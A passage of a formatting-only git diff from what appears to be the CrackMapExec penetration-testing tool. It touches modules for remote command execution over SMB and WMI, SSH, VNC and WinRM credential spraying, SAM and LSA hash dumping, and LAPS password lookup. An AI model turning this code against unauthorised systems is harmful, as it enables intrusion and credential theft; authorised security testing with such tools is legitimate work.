\\\\127.0.0.1\\{self.__share_name}\\{self.__output} 2^>^&1 > %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c del %TEMP%\{self.__batchFile}" else: command = self.__shell + data @@ -156,9 +152,7 @@ class SMBEXEC: return while True: try: - self.__smbconnection.getFile( - self.__share, self.__output, self.output_callback - ) + self.__smbconnection.getFile(self.__share, self.__output, self.output_callback) break except Exception as e: print(e) @@ -178,11 +172,7 @@ class SMBEXEC: local_ip = self.__rpctransport.get_socket().getsockname()[0] if self.__retOutput: - command = ( - self.__shell - + data - + f" ^> \\\\{local_ip}\\{self.__share_name}\\{self.__output}" - ) + command = self.__shell + data + f" ^> \\\\{local_ip}\\{self.__share_name}\\{self.__output}" else: command = self.__shell + data @@ -191,9 +181,7 @@ class SMBEXEC: self.logger.debug("Hosting batch file with command: " + command) - command = ( - self.__shell + f"\\\\{local_ip}\\{self.__share_name}\\{self.__batchFile}" - ) + command = self.__shell + f"\\\\{local_ip}\\{self.__share_name}\\{self.__batchFile}" self.logger.debug("Command to execute: " + command) self.logger.debug(f"Remote service {self.__serviceName} created.") @@ -223,9 +211,7 @@ class SMBEXEC: while True: try: - with open( - path_join("/tmp", "cme_hosted", self.__output), "rb" - ) as output: + with open(path_join("/tmp", "cme_hosted", self.__output), "rb") as output: self.output_callback(output.read()) break except IOError: diff --git a/cme/protocols/smb/smbspider.py b/cme/protocols/smb/smbspider.py index 0329abec..a0aad13a 100755 --- a/cme/protocols/smb/smbspider.py +++ b/cme/protocols/smb/smbspider.py @@ -96,9 +96,7 @@ class SMBSpider: except SessionError as e: if not filelist: if "STATUS_ACCESS_DENIED" not in str(e): - self.logger.debug( - f"Failed listing files on share {self.share} in directory {subfolder}: {e}" - ) + self.logger.debug(f"Failed listing files on share {self.share} in directory {subfolder}: {e}") return for result in filelist: @@ -108,9 +106,7 @@ class SMBSpider: subfolder.replace("*", "") + result.get_longname(), depth - 1 if depth else None, ) - elif subfolder != "*" and ( - subfolder[:-2].split("/")[-1] not in self.exclude_dirs - ): + elif subfolder != "*" and (subfolder[:-2].split("/")[-1] not in self.exclude_dirs): self._spider( subfolder.replace("*", "") + result.get_longname(), depth - 1 if depth else None, @@ -122,16 +118,9 @@ class SMBSpider: for result in files: if self.pattern: for pattern in self.pattern: - if ( - bytes(result.get_longname().lower(), "utf8").find( - bytes(pattern.lower(), "utf8") - ) - != -1 - ): + if bytes(result.get_longname().lower(), "utf8").find(bytes(pattern.lower(), "utf8")) != -1: if not self.onlyfiles and result.is_directory(): - self.logger.highlight( - f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]" - ) + self.logger.highlight(f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]") else: self.logger.highlight( "//{}/{}/{}{} [lastm:'{}' size:{}]".format( @@ -139,9 +128,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), ) ) @@ -150,9 +137,7 @@ class SMBSpider: for regex in self.regex: if regex.findall(bytes(result.get_longname(), "utf8")): if not self.onlyfiles and result.is_directory(): - self.logger.highlight( - f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]" - ) + self.logger.highlight(f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]") else: self.logger.highlight( "//{}/{}/{}{} [lastm:'{}' size:{}]".format( @@ -160,9 +145,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), ) ) @@ -206,9 +189,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), rfile.tell(), pattern, @@ -224,9 +205,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), rfile.tell(), regex.pattern, @@ -247,9 +226,7 @@ class SMBSpider: def get_lastm_time(self, result_obj): lastm_time = None try: - lastm_time = strftime( - "%Y-%m-%d %H:%M", localtime(result_obj.get_mtime_epoch()) - ) + lastm_time = strftime("%Y-%m-%d %H:%M", localtime(result_obj.get_mtime_epoch())) except Exception: pass diff --git a/cme/protocols/smb/wmiexec.py b/cme/protocols/smb/wmiexec.py index b6d7046a..57c8e2e2 100755 --- a/cme/protocols/smb/wmiexec.py +++ b/cme/protocols/smb/wmiexec.py @@ -25,6 +25,7 @@ class WMIEXEC: kdcHost=None, hashes=None, share=None, + logger=cme_logger ): self.__target = target self.__username = username @@ -43,7 +44,7 @@ class WMIEXEC: self.__kdcHost = kdcHost self.__doKerberos = doKerberos self.__retOutput = True - self.logger = cme_logger + self.logger = logger if hashes is not None: # This checks to see if we didn't provide the LM Hash @@ -66,9 +67,7 @@ class WMIEXEC: doKerberos=self.__doKerberos, kdcHost=self.__kdcHost, ) - iInterface = self.__dcom.CoCreateInstanceEx( - wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login - ) + iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) iWbemLevel1Login.RemRelease() @@ -127,11 +126,7 @@ class WMIEXEC: self.__output = gen_random_string(6) local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0] - command = ( - self.__shell - + data - + f" 1> \\\\{local_ip}\\{self.__share_name}\\{self.__output} 2>&1" - ) + command = self.__shell + data + f" 1> \\\\{local_ip}\\{self.__share_name}\\{self.__output} 2>&1" self.logger.debug("Executing command: " + command) self.__win32Process.Create(command, self.__pwd, None) @@ -140,9 +135,7 @@ class WMIEXEC: def get_output_fileless(self): while True: try: - with open( - os.path.join("/tmp", "cme_hosted", self.__output), "r" - ) as output: + with open(os.path.join("/tmp", "cme_hosted", self.__output), "r") as output: self.output_callback(output.read()) break except IOError: @@ -155,9 +148,7 @@ class WMIEXEC: while True: try: - self.__smbconnection.getFile( - self.__share, self.__output, self.output_callback - ) + self.__smbconnection.getFile(self.__share, self.__output, self.output_callback) break except Exception as e: if str(e).find("STATUS_SHARING_VIOLATION") >= 0: diff --git a/cme/protocols/ssh.py b/cme/protocols/ssh.py index 7c75380c..15eafa73 100644 --- a/cme/protocols/ssh.py +++ b/cme/protocols/ssh.py @@ -25,40 +25,26 @@ class ssh(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - ssh_parser = parser.add_parser( - "ssh", help="own stuff using SSH", parents=[std_parser, module_parser] - ) + ssh_parser = parser.add_parser("ssh", help="own stuff using SSH", parents=[std_parser, module_parser]) ssh_parser.add_argument( "--no-bruteforce", action="store_true", - help=( - "No spray when using file for username and password (user1 =>" - " password1, user2 => password2" - ), + help=("No spray when using file for username and password (user1 =>" " password1, user2 => password2"), ) ssh_parser.add_argument( "--key-file", type=str, - help=( - "Authenticate using the specified private key. Treats the password" - " parameter as the key's passphrase." - ), - ) - ssh_parser.add_argument( - "--port", type=int, default=22, help="SSH port (default: 22)" + help=("Authenticate using the specified private key. Treats the password" " parameter as the key's passphrase."), ) + ssh_parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)") ssh_parser.add_argument( "--continue-on-success", action="store_true", help="continues authentication attempts even after successes", ) - cgroup = ssh_parser.add_argument_group( - "Command Execution", "Options for executing commands" - ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup = ssh_parser.add_argument_group("Command Execution", "Options for executing commands") + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") cgroup.add_argument( "-x", metavar="COMMAND", @@ -96,9 +82,7 @@ class ssh(connection): stdin, stdout, stderr = self.conn.exec_command("uname -r") self.server_os = stdout.read().decode("utf-8") self.logger.debug(f"OS retrieved: {self.server_os}") - self.db.add_host( - self.host, self.args.port, self.remote_version, os=self.server_os - ) + self.db.add_host(self.host, self.args.port, self.remote_version, os=self.server_os) def create_conn_obj(self): self.conn = paramiko.SSHClient() @@ -126,9 +110,7 @@ class ssh(connection): self.logger.info(f"Determined user is root via `id` command") self.admin_privs = True return True - stdin, stdout, stderr = self.conn.exec_command( - "sudo -ln | grep 'NOPASSWD: ALL'" - ) + stdin, stdout, stderr = self.conn.exec_command("sudo -ln | grep 'NOPASSWD: ALL'") if stdout.read().decode("utf-8").find("NOPASSWD: ALL") != -1: self.logger.info(f"Determined user is root via `sudo -ln` command") self.admin_privs = True @@ -185,13 +167,9 @@ class ssh(connection): if self.check_if_admin(): shell_access = True - self.logger.debug( - f"User {username} logged in successfully and is root!" - ) + self.logger.debug(f"User {username} logged in successfully and is root!") if self.args.key_file: - self.db.add_admin_user( - "key", username, password, host_id=host_id, cred_id=cred_id - ) + self.db.add_admin_user("key", username, password, host_id=host_id, cred_id=cred_id) else: self.db.add_admin_user( "plaintext", @@ -216,9 +194,7 @@ class ssh(connection): display_shell_access = f" - shell access!" if shell_access else "" - self.logger.success( - f"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}" - ) + self.logger.success(f"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}") if not self.args.continue_on_success: return True diff --git a/cme/protocols/ssh/database.py b/cme/protocols/ssh/database.py index 07500023..c1d7650a 100644 --- a/cme/protocols/ssh/database.py +++ b/cme/protocols/ssh/database.py @@ -88,29 +88,14 @@ class database: def reflect_tables(self): with self.db_engine.connect(): try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.LoggedinRelationsTable = Table( - "loggedin_relations", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) - self.KeysTable = Table( - "keys", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) + self.KeysTable = Table("keys", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): ssh_workspace = f"~/.cme/workspaces/{cme_workspace}/ssh.db" - print( - "[-] Error reflecting tables for SSH protocol - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - f"[-] Optionally save the old DB data (`cp {ssh_workspace} ~/cme_ssh.bak`)\n" - f"[-] Then remove the CME SSH DB (`rm -rf {ssh_workspace}`) and run CME to initialize the new DB" - ) + print("[-] Error reflecting tables for SSH protocol - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" f"[-] Optionally save the old DB data (`cp {ssh_workspace} ~/cme_ssh.bak`)\n" f"[-] Then remove the CME SSH DB (`rm -rf {ssh_workspace}`) and run CME to initialize the new DB") exit() def shutdown_db(self): @@ -170,9 +155,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.sess.execute(q, hosts) # .scalar() # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted @@ -192,10 +175,8 @@ class database: select(self.CredentialsTable) .join(self.KeysTable) .filter( - func.lower(self.CredentialsTable.c.username) - == func.lower(username), - func.lower(self.CredentialsTable.c.credtype) - == func.lower(credtype), + func.lower(self.CredentialsTable.c.username) == func.lower(username), + func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype), self.KeysTable.c.data == key, ) ) @@ -232,15 +213,9 @@ class database: credentials.append(cred_data) # TODO: find a way to abstract this away to a single Upsert call - q_users = Insert( - self.CredentialsTable - ) # .returning(self.CredentialsTable.c.id) - update_columns_users = { - col.name: col for col in q_users.excluded if col.name not in "id" - } - q_users = q_users.on_conflict_do_update( - index_elements=self.CredentialsTable.primary_key, set_=update_columns_users - ) + q_users = Insert(self.CredentialsTable) # .returning(self.CredentialsTable.c.id) + update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"} + q_users = q_users.on_conflict_do_update(index_elements=self.CredentialsTable.primary_key, set_=update_columns_users) cme_logger.debug(f"Adding credentials: {credentials}") self.sess.execute(q_users, credentials) # .scalar() @@ -261,17 +236,13 @@ class database: """ del_hosts = [] for cred_id in creds_id: - q = delete(self.CredentialsTable).filter( - self.CredentialsTable.c.id == cred_id - ) + q = delete(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id) del_hosts.append(q) self.sess.execute(q) def add_key(self, cred_id, key): # check if key relation already exists - check_q = self.sess.execute( - select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id) - ).all() + check_q = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all() cme_logger.debug(f"check_q: {check_q}") if check_q: cme_logger.debug(f"Key already exists for cred_id {cred_id}") @@ -279,13 +250,7 @@ class database: key_data = {"credid": cred_id, "data": key} self.sess.execute(Insert(self.KeysTable), key_data) - key_id = ( - self.sess.execute( - select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id) - ) - .all()[0] - .id - ) + key_id = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all()[0].id cme_logger.debug(f"Key added: {key_id}") return key_id @@ -334,13 +299,9 @@ class database: def get_admin_relations(self, cred_id=None, host_id=None): if cred_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.credid == cred_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.credid == cred_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -374,19 +335,13 @@ class database: """ # if we're returning a single credential by ID if self.is_credential_valid(filter_term): - q = select(self.CredentialsTable).filter( - self.CredentialsTable.c.id == filter_term - ) + q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == filter_term) elif cred_type: - q = select(self.CredentialsTable).filter( - self.CredentialsTable.c.credtype == cred_type - ) + q = select(self.CredentialsTable).filter(self.CredentialsTable.c.credtype == cred_type) # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.CredentialsTable).filter( - func.lower(self.CredentialsTable.c.username).like(like_term) - ) + q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.CredentialsTable) @@ -455,9 +410,7 @@ class database: return results def get_user(self, domain, username): - q = select(self.CredentialsTable).filter( - func.lower(self.CredentialsTable.c.username) == func.lower(username) - ) + q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username) == func.lower(username)) results = self.sess.execute(q).all() return results @@ -474,23 +427,17 @@ class database: try: cme_logger.debug(f"Inserting loggedin_relations: {relation}") # TODO: find a way to abstract this away to a single Upsert call - q = Insert( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) self.sess.execute(q, [relation]) # .scalar() inserted_id_results = self.get_loggedin_relations(cred_id, host_id) - cme_logger.debug( - f"Checking if relation was added: {inserted_id_results}" - ) + cme_logger.debug(f"Checking if relation was added: {inserted_id_results}") return inserted_id_results[0].id except Exception as e: cme_logger.debug(f"Error inserting LoggedinRelation: {e}") def get_loggedin_relations(self, cred_id=None, host_id=None, shell=None): - q = select( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) if cred_id: q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id) if host_id: diff --git a/cme/protocols/ssh/db_navigator.py b/cme/protocols/ssh/db_navigator.py index 1bcfd765..c213ac3a 100644 --- a/cme/protocols/ssh/db_navigator.py +++ b/cme/protocols/ssh/db_navigator.py @@ -26,9 +26,7 @@ class navigator(DatabaseNavigator): admin_links = self.db.get_admin_relations(cred_id=cred_id) total_users = self.db.get_loggedin_relations(cred_id=cred_id) - total_shell = total_users = self.db.get_loggedin_relations( - cred_id=cred_id, shell=True - ) + total_shell = total_users = self.db.get_loggedin_relations(cred_id=cred_id, shell=True) data.append( [ @@ -95,12 +93,8 @@ class navigator(DatabaseNavigator): data.append([host_id, host, port, banner, os]) print_table(data, title="Host") - admin_access_data = [ - ["CredID", "CredType", "UserName", "Password", "Shell"] - ] - nonadmin_access_data = [ - ["CredID", "CredType", "UserName", "Password", "Shell"] - ] + admin_access_data = [["CredID", "CredType", "UserName", "Password", "Shell"]] + nonadmin_access_data = [["CredID", "CredType", "UserName", "Password", "Shell"]] for host_id in host_id_list: admin_links = self.db.get_admin_relations(host_id=host_id) nonadmin_links = self.db.get_loggedin_relations(host_id=host_id) @@ -116,9 +110,7 @@ class navigator(DatabaseNavigator): credtype = cred[3] shell = True - admin_access_data.append( - [cred_id, credtype, username, password, shell] - ) + admin_access_data.append([cred_id, credtype, username, password, shell]) # probably a better way to do this without looping through and requesting them all again, # but I just want to get this working for now @@ -143,9 +135,7 @@ class navigator(DatabaseNavigator): title="Credential(s) with Non Admin Access", ) if len(admin_access_data) > 1: - print_table( - admin_access_data, title="Credential(s) with Admin Access" - ) + print_table(admin_access_data, title="Credential(s) with Admin Access") def help_hosts(self): help_string = """ @@ -208,12 +198,8 @@ class navigator(DatabaseNavigator): cred_data.append([cred_id, username, password, credtype]) print_table(cred_data, title="Credential(s)") - admin_access_data = [ - ["HostID", "Host", "Port", "Banner", "OS", "Shell"] - ] - nonadmin_access_data = [ - ["HostID", "Host", "Port", "Banner", "OS", "Shell"] - ] + admin_access_data = [["HostID", "Host", "Port", "Banner", "OS", "Shell"]] + nonadmin_access_data = [["HostID", "Host", "Port", "Banner", "OS", "Shell"]] for cred_id in cred_id_list: admin_links = self.db.get_admin_relations(cred_id=cred_id) @@ -228,13 +214,9 @@ class navigator(DatabaseNavigator): port = h[2] banner = h[3] os = h[4] - shell = ( - True # if we have root via SSH, we know it's a shell - ) + shell = True # if we have root via SSH, we know it's a shell - admin_access_data.append( - [host_id, host, port, banner, os, shell] - ) + admin_access_data.append([host_id, host, port, banner, os, shell]) # probably a better way to do this without looping through and requesting them all again, # but I just want to get this working for now @@ -253,9 +235,7 @@ class navigator(DatabaseNavigator): # we look if it's greater than one because the header row always exists if len(nonadmin_access_data) > 1: - print_table( - nonadmin_access_data, title="Non-Admin Access to Host(s)" - ) + print_table(nonadmin_access_data, title="Non-Admin Access to Host(s)") if len(admin_access_data) > 1: print_table(admin_access_data, title="Admin Access to Host(s)") @@ -307,13 +287,7 @@ class navigator(DatabaseNavigator): print_help(help_string) def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you" - " want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you" " want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/vnc.py b/cme/protocols/vnc.py index cc33af9d..6359e0c6 100644 --- a/cme/protocols/vnc.py +++ b/cme/protocols/vnc.py @@ -30,9 +30,7 @@ class vnc(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - vnc_parser = parser.add_parser( - "vnc", help="own stuff using VNC", parents=[std_parser, module_parser] - ) + vnc_parser = parser.add_parser("vnc", help="own stuff using VNC", parents=[std_parser, module_parser]) vnc_parser.add_argument( "--no-bruteforce", action="store_true", @@ -43,9 +41,7 @@ class vnc(connection): action="store_true", help="continues authentication attempts even after successes", ) - vnc_parser.add_argument( - "--port", type=int, default=5900, help="Custom VNC port" - ) + vnc_parser.add_argument("--port", type=int, default=5900, help="Custom VNC port") vnc_parser.add_argument( "--vnc-sleep", type=int, @@ -59,9 +55,7 @@ class vnc(connection): action="store_true", help="Screenshot VNC if connection success", ) - egroup.add_argument( - "--screentime", type=int, default=5, help="Time to wait for desktop image" - ) + egroup.add_argument("--screentime", type=int, default=5, help="Time to wait for desktop image") return parser @@ -91,12 +85,8 @@ class vnc(connection): def create_conn_obj(self): try: self.target = RDPTarget(ip=self.host, port=self.args.port) - credential = UniCredential( - protocol=asyauthProtocol.PLAIN, stype=asyauthSecret.NONE - ) - self.conn = VNCConnection( - target=self.target, credentials=credential, iosettings=self.iosettings - ) + credential = UniCredential(protocol=asyauthProtocol.PLAIN, stype=asyauthSecret.NONE) + self.conn = VNCConnection(target=self.target, credentials=credential, iosettings=self.iosettings) asyncio.run(self.connect_vnc(True)) except Exception as e: self.logger.debug(str(e)) @@ -117,9 +107,7 @@ class vnc(connection): stype = asyauthSecret.PASS if password == "": stype = asyauthSecret.NONE - self.credential = UniCredential( - secret=password, protocol=asyauthProtocol.PLAIN, stype=stype - ) + self.credential = UniCredential(secret=password, protocol=asyauthProtocol.PLAIN, stype=stype) self.conn = VNCConnection( target=self.target, credentials=self.credential, @@ -131,11 +119,7 @@ class vnc(connection): self.logger.success( "{} {}".format( password, - highlight( - f"({self.config.get('CME', 'pwn3d_label')})" - if self.admin_privs - else "" - ), + highlight(f"({self.config.get('CME', 'pwn3d_label')})" if self.admin_privs else ""), ) ) if not self.args.continue_on_success: @@ -147,11 +131,7 @@ class vnc(connection): self.logger.success( "{} {}".format( "No password seems to be accepted by the server", - highlight( - f"({self.config.get('CME', 'pwn3d_label')})" - if self.admin_privs - else "" - ), + highlight(f"({self.config.get('CME', 'pwn3d_label')})" if self.admin_privs else ""), ) ) else: @@ -159,16 +139,12 @@ class vnc(connection): return False async def screen(self): - self.conn = VNCConnection( - target=self.target, credentials=self.credential, iosettings=self.iosettings - ) + self.conn = VNCConnection(target=self.target, credentials=self.credential, iosettings=self.iosettings) await self.connect_vnc() await asyncio.sleep(int(self.args.screentime)) if self.conn is not None and self.conn.desktop_buffer_has_data is True: buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL) - filename = os.path.expanduser( - f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png" - ) + filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png") buffer.save(filename, "png") self.logger.highlight(f"Screenshot saved {filename}") diff --git a/cme/protocols/vnc/database.py b/cme/protocols/vnc/database.py index 1c5003f2..1f910278 100644 --- a/cme/protocols/vnc/database.py +++ b/cme/protocols/vnc/database.py @@ -55,19 +55,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/vnc/db_navigator.py b/cme/protocols/vnc/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/vnc/db_navigator.py +++ b/cme/protocols/vnc/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/winrm.py b/cme/protocols/winrm.py index 947808db..9cc1365e 100644 --- a/cme/protocols/winrm.py +++ b/cme/protocols/winrm.py @@ -31,9 +31,7 @@ class winrm(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - winrm_parser = parser.add_parser( - "winrm", help="own stuff using WINRM", parents=[std_parser, module_parser] - ) + winrm_parser = parser.add_parser("winrm", help="own stuff using WINRM", parents=[std_parser, module_parser]) winrm_parser.add_argument( "-H", "--hash", @@ -46,22 +44,15 @@ class winrm(connection): winrm_parser.add_argument( "--no-bruteforce", action="store_true", - help=( - "No spray when using file for username and password (user1 =>" - " password1, user2 => password2" - ), + help=("No spray when using file for username and password (user1 =>" " password1, user2 => password2"), ) winrm_parser.add_argument( "--continue-on-success", action="store_true", help="continues authentication attempts even after successes", ) - winrm_parser.add_argument( - "--port", type=int, default=0, help="Custom WinRM port" - ) - winrm_parser.add_argument( - "--ssl", action="store_true", help="Connect to SSL Enabled WINRM" - ) + winrm_parser.add_argument("--port", type=int, default=0, help="Custom WinRM port") + winrm_parser.add_argument("--ssl", action="store_true", help="Connect to SSL Enabled WINRM") winrm_parser.add_argument( "--ignore-ssl-cert", action="store_true", @@ -98,23 +89,13 @@ class winrm(connection): help="authenticate locally to each target", ) - cgroup = winrm_parser.add_argument_group( - "Credential Gathering", "Options for gathering credentials" - ) + cgroup = winrm_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") cegroup = cgroup.add_mutually_exclusive_group() - cegroup.add_argument( - "--sam", action="store_true", help="dump SAM hashes from target systems" - ) - cegroup.add_argument( - "--lsa", action="store_true", help="dump LSA secrets from target systems" - ) + cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems") + cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems") - cgroup = winrm_parser.add_argument_group( - "Command Execution", "Options for executing commands" - ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup = winrm_parser.add_argument_group("Command Execution", "Options for executing commands") + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") cgroup.add_argument( "-x", metavar="COMMAND", @@ -159,9 +140,7 @@ class winrm(connection): no_ntlm = True pass - self.domain = ( - smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain - ) + self.domain = smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain self.hostname = smb_conn.getServerName() if not no_ntlm else self.host self.server_os = smb_conn.getServerOS() if isinstance(self.server_os.lower(), bytes): @@ -169,9 +148,7 @@ class winrm(connection): self.logger.extra["hostname"] = self.hostname - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") try: smb_conn.logoff() @@ -193,13 +170,9 @@ class winrm(connection): if self.domain is None: self.domain = "" - self.db.add_host( - self.host, self.port, self.hostname, self.domain, self.server_os - ) + self.db.add_host(self.host, self.port, self.hostname, self.domain, self.server_os) - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") def laps_search(self, username, password, ntlm_hash, domain): @@ -226,25 +199,17 @@ class winrm(connection): ntlm_hash[0] if ntlm_hash else "", ) if not connection: - self.logger.fail( - "LDAP connection failed with account {}".format(username[0]) - ) + self.logger.fail("LDAP connection failed with account {}".format(username[0])) return False - search_filter = ( - "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" - + self.hostname - + "))" - ) + search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))" attributes = [ "msLAPS-EncryptedPassword", "msLAPS-Password", "ms-MCS-AdmPwd", "sAMAccountName", ] - results = connection.search( - searchFilter=search_filter, attributes=attributes, sizeLimit=0 - ) + results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0) msMCSAdmPwd = "" sAMAccountName = "" @@ -252,20 +217,12 @@ class winrm(connection): from impacket.ldap import ldapasn1 as ldapasn1_impacket - results = [ - r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry) - ] + results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)] if len(results) != 0: for host in results: - values = { - str(attr["type"]).lower(): 